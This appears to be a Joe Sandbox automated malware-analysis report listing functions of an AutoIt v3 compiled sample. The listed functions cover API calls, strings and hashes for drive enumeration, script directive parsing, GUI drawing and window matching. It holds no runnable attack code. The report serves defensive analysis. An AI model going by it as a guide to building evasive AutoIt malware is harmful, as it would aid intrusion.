Instruction ID: d2e4a66305a7bfb243408a74cb854ce4d3647cf1da8c44eb06561babc9905596
Opcode Fuzzy Hash: cc31fbe6d15ae3bb33d207345f755031fe7ddf7217cc2b61a15cbedc439a7139
Instruction Fuzzy Hash: F3A181B1A40605BFEB14DBA4DC4AFAE7BB9EB05714F108219FA14E72E0D770AD01DB64

Function 00C7AD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00C7AD1E
GetDriveTypeW.KERNEL32(?,00C9FAC0,?,\\.\,00C9F910), ref: 00C7ADFB
SetErrorMode.KERNEL32(00000000,00C9FAC0,?,\\.\,00C9F910), ref: 00C7AF59

Strings

ATA, xrefs: 00C7AED4
CDROM, xrefs: 00C7AE2F
SATA, xrefs: 00C7AF0C
FileBackedVirtual, xrefs: 00C7AF28
Fibre, xrefs: 00C7AEE9
\\.\, xrefs: 00C7AD70
SSD, xrefs: 00C7AE86
Unknown, xrefs: 00C7AE1B, 00C7AEBF
MMC, xrefs: 00C7AF1A
USB, xrefs: 00C7AEF0
Virtual, xrefs: 00C7AF21
ATAPI, xrefs: 00C7AECD
SCSI, xrefs: 00C7AEC6
Network, xrefs: 00C7AE39
PhysicalDrive, xrefs: 00C7ADA7
Removable, xrefs: 00C7AE4D
RAMDisk, xrefs: 00C7AE25
1394, xrefs: 00C7AEDB
Fixed, xrefs: 00C7AE43
RAID, xrefs: 00C7AEF7
SAS, xrefs: 00C7AF05
SSA, xrefs: 00C7AEE2
iSCSI, xrefs: 00C7AEFE

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: b13a892dc03922e50f23822ff04f431f8cade5eed24643f931b58e3b79a5cafb
Instruction ID: eee0c6c0c6062f468c346a0c9a5d8e3c704827bbb85902e51f6a2bb66c45e756
Opcode Fuzzy Hash: b13a892dc03922e50f23822ff04f431f8cade5eed24643f931b58e3b79a5cafb
Instruction Fuzzy Hash: 355184B1649205EB8B10DB91C952EBE7361EB89700B20C06BF41BA72D1DB319E46FB53

Function 00C168DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00C16931
__wcsnicmp.LIBCMT ref: 00C16949
__wcsnicmp.LIBCMT ref: 00C16961
__wcsnicmp.LIBCMT ref: 00C16979
__wcsnicmp.LIBCMT ref: 00C16991
__wcsnicmp.LIBCMT ref: 00C169A9
__wcsnicmp.LIBCMT ref: 00C169C1
__wcsnicmp.LIBCMT ref: 00C169D5
__wcsnicmp.LIBCMT ref: 00C16A16
__wcsnicmp.LIBCMT ref: 00C16A2A
__wcsnicmp.LIBCMT ref: 00C16A3E
__wcsnicmp.LIBCMT ref: 00C16A52

Strings

Cannot parse #include, xrefs: 00C4E3F0
Bad directive syntax error, xrefs: 00C4E31A
#ce, xrefs: 00C16A4C
#cs, xrefs: 00C169CF, 00C16A24
#include-once, xrefs: 00C1698B
#include, xrefs: 00C169A3
Unterminated group of comments, xrefs: 00C4E403
#OnAutoItStartRegister, xrefs: 00C16973
#requireadmin, xrefs: 00C1695B
#pragma compile, xrefs: 00C1692B
#comments-start, xrefs: 00C169BB, 00C16A10
#comments-end, xrefs: 00C16A38
#notrayicon, xrefs: 00C16943

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: 80c9c3fd0f7716fe39608c00de9f46f1142d270a6558b60debd20ef8855e7f65
Instruction ID: 3f1a1d970af15ee194d5bcc649d7ba462d98bef3b05f1fe09190c3d2b0a1d862
Opcode Fuzzy Hash: 80c9c3fd0f7716fe39608c00de9f46f1142d270a6558b60debd20ef8855e7f65
Instruction Fuzzy Hash: 348104B1640215ABCF21BF65EC46FFF7768BF07700F044024F945AA192EB61DA86F2A1

Function 00C99A1C Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00C99AD2
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00C99B8B
SendMessageW.USER32(?,00001102,00000002,?), ref: 00C99BA7

Strings

0, xrefs: 00C99BE4

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: 5d896b5eab2908c7ae208aaff4716a8bf43bc5acee13b3450f21b3e8f073f427
Instruction ID: bc8b5cd82bd9a91b67a241bef3584d930be4a0df5427c1e4425570c017b8c443
Opcode Fuzzy Hash: 5d896b5eab2908c7ae208aaff4716a8bf43bc5acee13b3450f21b3e8f073f427
Instruction Fuzzy Hash: E402DD30104301AFEB25CF29C88DBAABBE5FF49314F04452DF9A9D62A1C735DA45DB92

Function 00C9A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00C9A903
SetTextColor.GDI32(?,?), ref: 00C9A907
GetSysColorBrush.USER32(0000000F), ref: 00C9A91D
GetSysColor.USER32(0000000F), ref: 00C9A928
CreateSolidBrush.GDI32(?), ref: 00C9A92D
GetSysColor.USER32(00000011), ref: 00C9A945
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00C9A953
SelectObject.GDI32(?,00000000), ref: 00C9A964
SetBkColor.GDI32(?,00000000), ref: 00C9A96D
SelectObject.GDI32(?,?), ref: 00C9A97A
InflateRect.USER32(?,000000FF,000000FF), ref: 00C9A999
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00C9A9B0
GetWindowLongW.USER32(00000000,000000F0), ref: 00C9A9C5
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C9A9ED
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00C9AA14
InflateRect.USER32(?,000000FD,000000FD), ref: 00C9AA32
DrawFocusRect.USER32(?,?), ref: 00C9AA3D
GetSysColor.USER32(00000011), ref: 00C9AA4B
SetTextColor.GDI32(?,00000000), ref: 00C9AA53
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00C9AA67
SelectObject.GDI32(?,00C9A5FA), ref: 00C9AA7E
DeleteObject.GDI32(?), ref: 00C9AA89
SelectObject.GDI32(?,?), ref: 00C9AA8F
DeleteObject.GDI32(?), ref: 00C9AA94
SetTextColor.GDI32(?,?), ref: 00C9AA9A
SetBkColor.GDI32(?,?), ref: 00C9AAA4

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 1809af119a527a840173cdd59015f9b0c0811bbf1b1beea65b85116c86af0d12
Instruction ID: 9512f3d028b2c64f3f056bcf0109f8f68330d23922bba52c1ccdd871f091edcd
Opcode Fuzzy Hash: 1809af119a527a840173cdd59015f9b0c0811bbf1b1beea65b85116c86af0d12
Instruction Fuzzy Hash: 1D510C71900218EFDF119FA4DC4CBAE7BB9FB48320F21452AF911EB2A1D6759A41DB90

Function 00C989D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00C98AC1
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C98AD2
CharNextW.USER32(0000014E), ref: 00C98B01
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00C98B42
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00C98B58
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C98B69
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00C98B86
SetWindowTextW.USER32(?,0000014E), ref: 00C98BD8
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00C98BEE
SendMessageW.USER32(?,00001002,00000000,?), ref: 00C98C1F
_memset.LIBCMT ref: 00C98C44
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00C98C8D
_memset.LIBCMT ref: 00C98CEC
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00C98D16
SendMessageW.USER32(?,00001074,?,00000001), ref: 00C98D6E
SendMessageW.USER32(?,0000133D,?,?), ref: 00C98E1B
InvalidateRect.USER32(?,00000000,00000001), ref: 00C98E3D
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00C98E87
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00C98EB4
DrawMenuBar.USER32(?), ref: 00C98EC3
SetWindowTextW.USER32(?,0000014E), ref: 00C98EEB

Strings

0, xrefs: 00C98E55

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 1249843093dbdd77ba0930895e23deca33df9446659bb5d09b7abbed1b966b66
Instruction ID: 2023fc6d1e04e67e035bd1f328dbe128e76e5689a4b99182776a704d865916fc
Opcode Fuzzy Hash: 1249843093dbdd77ba0930895e23deca33df9446659bb5d09b7abbed1b966b66
Instruction Fuzzy Hash: 22E15071900218ABDF209F61CC88FEE7B79EF06710F10815AF925AB290DF749A85DF60

Function 00C9488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00C949CA
GetDesktopWindow.USER32 ref: 00C949DF
GetWindowRect.USER32(00000000), ref: 00C949E6
GetWindowLongW.USER32(?,000000F0), ref: 00C94A48
DestroyWindow.USER32(?), ref: 00C94A74
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00C94A9D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C94ABB
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00C94AE1
SendMessageW.USER32(?,00000421,?,?), ref: 00C94AF6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00C94B09
IsWindowVisible.USER32(?), ref: 00C94B29
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00C94B44
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00C94B58
GetWindowRect.USER32(?,?), ref: 00C94B70
MonitorFromPoint.USER32(?,?,00000002), ref: 00C94B96
GetMonitorInfoW.USER32(00000000,?), ref: 00C94BB0
CopyRect.USER32(?,?), ref: 00C94BC7
SendMessageW.USER32(?,00000412,00000000), ref: 00C94C32

Strings

0, xrefs: 00C94975
tooltips_class32, xrefs: 00C94A96
(, xrefs: 00C94BA3

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 24bab89de8df9f3b6c486a83c30d093151606a5970b3e1cf7932310c7e3b7304
Instruction ID: 3ba6362a9ebd1603487721974658f93edaf4902a9c12d0b8bbdb96caa7e32bfa
Opcode Fuzzy Hash: 24bab89de8df9f3b6c486a83c30d093151606a5970b3e1cf7932310c7e3b7304
Instruction Fuzzy Hash: 98B18B71608340AFDB08DF65C848F6ABBE4FF89310F00891DF5999B2A1DB70E946DB95

Function 00C7449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00C744AC
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00C744D2
_wcscpy.LIBCMT ref: 00C74500
_wcscmp.LIBCMT ref: 00C7450B
_wcscat.LIBCMT ref: 00C74521
_wcsstr.LIBCMT ref: 00C7452C
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00C74548
_wcscat.LIBCMT ref: 00C74591
_wcscat.LIBCMT ref: 00C74598
_wcsncpy.LIBCMT ref: 00C745C3

Strings

%u.%u.%u.%u, xrefs: 00C74626
04090000, xrefs: 00C7457E
DefaultLangCodepage, xrefs: 00C745AB
StringFileInfo\, xrefs: 00C7451B
\VarFileInfo\Translation, xrefs: 00C74540

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: 81fbbdbfb6d4e380bc1169252d39950bcb0946d36df3b473b2c03f063e199e17
Instruction ID: 16816cb57a72ab4b4fcc1fad94ba7fa7f34ceb0a0e8a657a557c28af85fcf6f3
Opcode Fuzzy Hash: 81fbbdbfb6d4e380bc1169252d39950bcb0946d36df3b473b2c03f063e199e17
Instruction Fuzzy Hash: CE41F7326102147BDB14AB74DC47FBF77ACDF41710F14406AF909E6182EB359A01A6A9

Function 00C127D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C128BC
GetSystemMetrics.USER32(00000007), ref: 00C128C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C128EF
GetSystemMetrics.USER32(00000008), ref: 00C128F7
GetSystemMetrics.USER32(00000004), ref: 00C1291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00C12939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00C12949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00C1297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00C12990
GetClientRect.USER32(00000000,000000FF), ref: 00C129AE
GetStockObject.GDI32(00000011), ref: 00C129CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 00C129D5

Part of subcall function 00C12344: GetCursorPos.USER32(?), ref: 00C12357
Part of subcall function 00C12344: ScreenToClient.USER32(00CD57B0,?), ref: 00C12374
Part of subcall function 00C12344: GetAsyncKeyState.USER32(00000001), ref: 00C12399
Part of subcall function 00C12344: GetAsyncKeyState.USER32(00000002), ref: 00C123A7

SetTimer.USER32(00000000,00000000,00000028,00C11256), ref: 00C129FC

Strings

AutoIt v3 GUI, xrefs: 00C12974

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 65c393b33c1e5a8ece0bbb3a78e58d9975c34d54f591b527b210ed38a03f589f
Instruction ID: 36a95a6e0e416e18910d0fbcdf1fef13e74c282a2fcec3781027030047c3b06e
Opcode Fuzzy Hash: 65c393b33c1e5a8ece0bbb3a78e58d9975c34d54f591b527b210ed38a03f589f
Instruction Fuzzy Hash: B5B15D75A0120ADFDB14DFA8DC89BED7BB4FB08311F10412AFA15E62E0DB749951EB50

Function 00C6A439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00C6A47A
__swprintf.LIBCMT ref: 00C6A51B
_wcscmp.LIBCMT ref: 00C6A52E
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00C6A583
_wcscmp.LIBCMT ref: 00C6A5BF
GetClassNameW.USER32(?,?,00000400), ref: 00C6A5F6
GetDlgCtrlID.USER32(?), ref: 00C6A648
GetWindowRect.USER32(?,?), ref: 00C6A67E
GetParent.USER32(?), ref: 00C6A69C
ScreenToClient.USER32(00000000), ref: 00C6A6A3
GetClassNameW.USER32(?,?,00000100), ref: 00C6A71D
_wcscmp.LIBCMT ref: 00C6A731
GetWindowTextW.USER32(?,?,00000400), ref: 00C6A757
_wcscmp.LIBCMT ref: 00C6A76B

Part of subcall function 00C3362C: _iswctype.LIBCMT ref: 00C33634

Strings

%s%u, xrefs: 00C6A515

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: 34a33f8f8b345b64f37fd75b8abdd994e37f6eafbf020182e1cb6ca616bb1ff8
Instruction ID: a7a594205270e2ef5bcf5874b72d1b072de87f47398d750be8c20f15755ca014
Opcode Fuzzy Hash: 34a33f8f8b345b64f37fd75b8abdd994e37f6eafbf020182e1cb6ca616bb1ff8
Instruction Fuzzy Hash: C9A1A271204706AFD724DF64C8C4BAAB7E8FF44355F108529F9A9E2150DB30EA56CF92

Function 00C6AED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 00C6AF18
_wcscmp.LIBCMT ref: 00C6AF29
GetWindowTextW.USER32(00000001,?,00000400), ref: 00C6AF51
CharUpperBuffW.USER32(?,00000000), ref: 00C6AF6E
_wcscmp.LIBCMT ref: 00C6AF8C
_wcsstr.LIBCMT ref: 00C6AF9D
GetClassNameW.USER32(00000018,?,00000400), ref: 00C6AFD5
_wcscmp.LIBCMT ref: 00C6AFE5
GetWindowTextW.USER32(00000002,?,00000400), ref: 00C6B00C
GetClassNameW.USER32(00000018,?,00000400), ref: 00C6B055
_wcscmp.LIBCMT ref: 00C6B065
GetClassNameW.USER32(00000010,?,00000400), ref: 00C6B08D
GetWindowRect.USER32(00000004,?), ref: 00C6B0F6

Strings

@, xrefs: 00C6AEF9
ThumbnailClass, xrefs: 00C6AFE0, 00C6B060

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 093a49f1e1363f3b080d6f54fc995e049de3800f38a4b27b97b2bfef3ad7a424
Instruction ID: c1674919f1cba2d620fa25357ba2bbf23d3284164b2e374cdd38d66e745e31c2
Opcode Fuzzy Hash: 093a49f1e1363f3b080d6f54fc995e049de3800f38a4b27b97b2bfef3ad7a424
Instruction Fuzzy Hash: 27819F71108305AFDB24DF50C8C5BAA7BE8EF44354F04846AFD95DA092DB30DE86CBA2

Function 00C6ABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00C6AC33

Strings

[CLASS:, xrefs: 00C6AC83
[ALL, xrefs: 00C6ACD9
HANDLE=, xrefs: 00C6AC2C
[ACTIVE, xrefs: 00C6AC20
[REGEXPTITLE:, xrefs: 00C6AC5B
[HANDLE:, xrefs: 00C6AC3F
LAST, xrefs: 00C6ABF8
[LAST, xrefs: 00C6ACE0
CLASSNAME=, xrefs: 00C6AC70
ALL, xrefs: 00C6ACC7
REGEXP=, xrefs: 00C6AC48
ACTIVE, xrefs: 00C6AC0E

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 833f9639e5280b69382726341a5fe26bed7c50d9c689681c3da662047fd24d76
Instruction ID: 58bc55ff152e7416e6f49844a0abf58ae36b8b8b15332fd2e5ded1ea0ea231dc
Opcode Fuzzy Hash: 833f9639e5280b69382726341a5fe26bed7c50d9c689681c3da662047fd24d76
Instruction Fuzzy Hash: 0E314F31948209BBDB24FA51DE83FEE77A4AB11751F600629F412710D1EF526F44BE92

Function 00C84FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 00C85013
LoadCursorW.USER32(00000000,00007F00), ref: 00C8501E
LoadCursorW.USER32(00000000,00007F03), ref: 00C85029
LoadCursorW.USER32(00000000,00007F8B), ref: 00C85034
LoadCursorW.USER32(00000000,00007F01), ref: 00C8503F
